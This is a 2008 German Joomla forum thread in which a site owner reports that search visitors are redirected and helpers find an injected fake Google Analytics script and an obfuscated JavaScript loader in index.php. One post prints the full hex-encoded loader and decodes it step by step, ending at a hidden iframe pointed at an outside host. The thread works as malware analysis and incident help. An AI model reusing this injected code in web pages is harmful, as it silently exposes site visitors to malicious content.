Erweiterungen & Templates für Joomla     Support Chat     JoomlaJobs    

   

 

Zurück   Joomla CMS Support Forum > Joomla 1.0x > Sicherheit
Benutzername
Kennwort
Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht

  #1 (permalink)
Alt 18.06.2008, 17:36
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard meine Seite wurde von fremder Hand verlinkt

Hi Cracks!

Wenn Google meine Seite www.atmonis.ch findet, z.B. über "Kreta, Meersicht" (mit diesen Begriffen ist sie ganz oben - was aber noch das einzige erfeuliche ist) und dann der Hyperlink angeklickt wird, KOMMT MAN AUF EINE ANDERE SEITE! (Da reicht ein Wütend-Smiley nicht mehr).

Was kann ich machen?
Hat jemand mein Passwort geknackt?

Version: 1.0.15 Stable
Module:
- astatsPRO
- joomfish
- easybook

Besten Dank!
Ago

EDIT:
http://www.joomlaportal.de/sicherhei...ogle-info.html

Geändert von Agoraso (30.06.2008 um 17:39 Uhr). Grund: Link zur Zusammenfassung
Agoraso ist offline   Mit Zitat antworten
  #2 (permalink)
Alt 18.06.2008, 17:47
Ex-Über-Mod
 
Benutzerbild von rico
 
Registriert seit: 04.12.2005
Ort: Potsdam
Beiträge: 1,699
Bedankte sich: 237
462 Danksagungen in 381 Beiträgen
rico eine Nachricht über Skype™ schicken
Standard

Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

MFG. Ricola
rico ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #3 (permalink)
Alt 18.06.2008, 17:49
Joomla Experte
 
Benutzerbild von jimbo_
 
Registriert seit: 14.06.2008
Ort: Schweiz
Beiträge: 350
Bedankte sich: 0
95 Danksagungen in 92 Beiträgen
Standard

Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...
__________________
Gruss Jimbo
–––––––––––––––––––––––––––––––––––
Warum ich keinen individuellen Support geben kann. * Regeln für Supportsuchende.
jimbo_ ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #4 (permalink)
Alt 18.06.2008, 18:07
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Zitat:
Zitat von ricola Beitrag anzeigen
Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

MFG. Ricola
Hallo Ricola
Ja, so sehe ich das auch - es ist aber nicht meine Seite und ich will, dass sich MEINE Seite öffnet, egal was die falsche für eine ist.
Danke
Ago
Agoraso ist offline   Mit Zitat antworten
  #5 (permalink)
Alt 18.06.2008, 18:10
Joomlaianer
 
Registriert seit: 17.12.2007
Beiträge: 78
Bedankte sich: 52
1 Danksagung in 1 Beitrag
Standard

Zitat:
Zitat von jimbo_ Beitrag anzeigen
Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...
Hoi Jimbo
Kann ich in index.php die Zeilen google-analytics einfach löschen?
Wie überprüfe ich den Code? Und wo ist der? (Sorry für die dumme Frage - bin Anfänger)
Danke
Ago
Agoraso ist offline   Mit Zitat antworten
  #6 (permalink)
Alt 18.06.2008, 18:23
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Es liegt recht sicher am fehlerhaften Google Analytics Code

So sollte der aussehen:
https://www.google.com/support/googl...55488&hl=de_DE
(Es gibt da zwei Varianten, steht aber alles beim Link ^^)

Den Code den du benötigst findest du in deinem Google Analytics Konto.
https://www.google.com/support/googl...y?answer=55603

Diesen Code ganz am ende des Template vor das </body>

Das doppelte
<script src="http://analytics-google.info/urchin.js"></script>
muss raus
(und .info ist eigentlich nicht von google??)

Björn

Ps. Und dann hast du noch astatsPRO drin, dann hast du die Statistik ja Doppelt und astatsPRO erzeugt extrem viele Daten in deiner Daten

PPs. und dann schau mal was das für ein kram ist, keine Ahung für was da gut sein soll
<body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

Letzte Zeile hinter: </html>
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a)
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #7 (permalink)
Alt 18.06.2008, 20:19
Joomla Profi
 
Benutzerbild von satriani-vai
 
Registriert seit: 31.01.2008
Beiträge: 197
Bedankte sich: 19
7 Danksagungen in 7 Beiträgen
Standard

Man muss aber bedenken, dass es das Performance der Seite beeinträchtigt
Ob es sich überhaupt lohnt?
satriani-vai ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #8 (permalink)
Alt 18.06.2008, 21:29
Moderator
 
Benutzerbild von flotte
 
Registriert seit: 20.03.2005
Ort: Neustadt
Beiträge: 4,671
Bedankte sich: 45
1,070 Danksagungen in 950 Beiträgen
Standard

Zumal auch noch astatsPRO in Betrieb ist... wie viel Statistik braucht einer Seite?
__________________
Gruß! Uwe

fc-hosting.de

. . . . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun?
flotte ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #9 (permalink)
Alt 18.06.2008, 22:49
Joomla Newbie
 
Registriert seit: 18.06.2008
Beiträge: 2
Bedankte sich: 0
5 Danksagungen in 1 Beitrag
Standard

Ich hab genau das gleiche Problem, bei mir in der index.php befinden sich seit gestern diese "Google Analytics" links.

In wirklichkeit kommt diese domain aber nicht von google, sondern von einem Hacker, den ich gestern dabei erwischt habe, wie er diesen Quellcode in meine Seite einbauen wollte!

Man beachte, dass,
http://www.google-analytics.com/urchin.js ---> das offizielle Java-Script von Google
http://www.analytics-google.info/urchin.js ---> und das der eingeschleuste Code vom Hacker ist!

Ausserdem hat bei mir der Hacker folgenden Code eingebaut:

Code:
<script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}function m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCode;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E[/size]';document.write(m4857aa739d4f5(m4857aa739f0bb));</script><!-- /ad --><script>check_content()</script>

Wenn man diesen entschlüsselt, kommt heraus, dass folgendes auf die Seite geladen wird:

Code:
function funktion3(parameter2) { function funktion2() {return 16;} return (parseInt(parameter2,funktion2()));} function funktion1(parameter1) { var variabel1=2; var variabel2=''; variabel3=String.fromCharCode; for(variabel4=0; variabel4<parameter1.length; variabel4+=variabel1) { variabel2+=(variabel3(funktion3(parameter1.substr(variabel4,variabel1))));} return variabel2;} var wert1='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E'; document.write(funktion1(wert1));
Dieser wiederrum ist wieder "verschlüsselt" und gibt schlussendlich folgendes auf die Seite aus:

Code:
</script><!-- /ad --> ********** function check_content() { var i=0; while(document.getElementsByTagName('iframe').length) { var el=document.getElementsByTagName('iframe')[i]; if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1') {el.parentNode.removeChild(el);} else i++; } } check_content(); if(!myia) {document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%76%69%76%69%74%75%73%63%69%61%2e%63%6f%6d%2f%69%6d%61%67%65%73%2f%73%74%61%74%73%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%39%31%32%38%29%2b%27%36%66%65%39%65%38%64%30%61%31%36%27%20%77%69%64%74%68%3d%37%38%33%20%68%65%69%67%68%74%3d%32%31%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script> <script>check_content()</script>
Und wenn man diesen "Verschlüsselten Code" auch hier wieder entschlüsselt sieht man, dass ein IFrame auf die Seite geladen wird:

Code:
<iframe name=c1 src='http://***********/stats.html?'+Math.round(Math.random()*169128)+'6fe9e8d0a16' width=783 height=216 style='display: none'></iframe>

Geändert von holmi (18.06.2008 um 23:31 Uhr). Grund: URL gelöscht
FoxCore ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #10 (permalink)
Alt 18.06.2008, 23:28
Moderator
 
Benutzerbild von holmi
 
Registriert seit: 30.08.2004
Ort: Harz
Beiträge: 6,492
Bedankte sich: 91
1,229 Danksagungen in 1,130 Beiträgen
holmi eine Nachricht über ICQ schicken holmi eine Nachricht über Skype™ schicken
Standard

Danke, das Beantwort mein PPS. von oben.
Die URL die da eingebunden wird habe ich mal gelöscht, wir wollen ja nicht noch Werbung dafür machen ;-)

@ Agoraso du solltest deine Seite jetzt schnell mal ganz genau Prüfen!
http://www.joomlaportal.de/sicherhei...tml#post665966

Welche Joomla Version nutzt du?
Welche Erweiterungen sind installiert? (Mit Version)
http://docs.joomla.org/Vulnerable_Extensions_List

Der Hacker kennt deine Passwörter und könnte noch mehr Code eingeschleust haben, kontrollier das also ordentlich.

EDIT:
Bei Google findet man noch mehr Foren in denen seit kurzen nach diesen Code gefragt wird
z.B. Hier:
http://forums.x10hosting.com/free-ho...ease-help.html
Und das Problem dieses Users sollte einem zu denken geben ;-)
Zitat:
Remove? No, it will automatically appear as a ghost! I cannot control that code.

Björn
__________________
Problem gelöst? Dann markiere den Thread mit [GELÖST]
holmi ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
Werbung
Antwort


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht




Alle Zeitangaben in WEZ +2. Es ist jetzt 10:10 Uhr.

Powered by vBulletin Version 3.6.2 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2
vBulletin Style by: vbdesigns.de
Copyright 2005 by Stefan Köller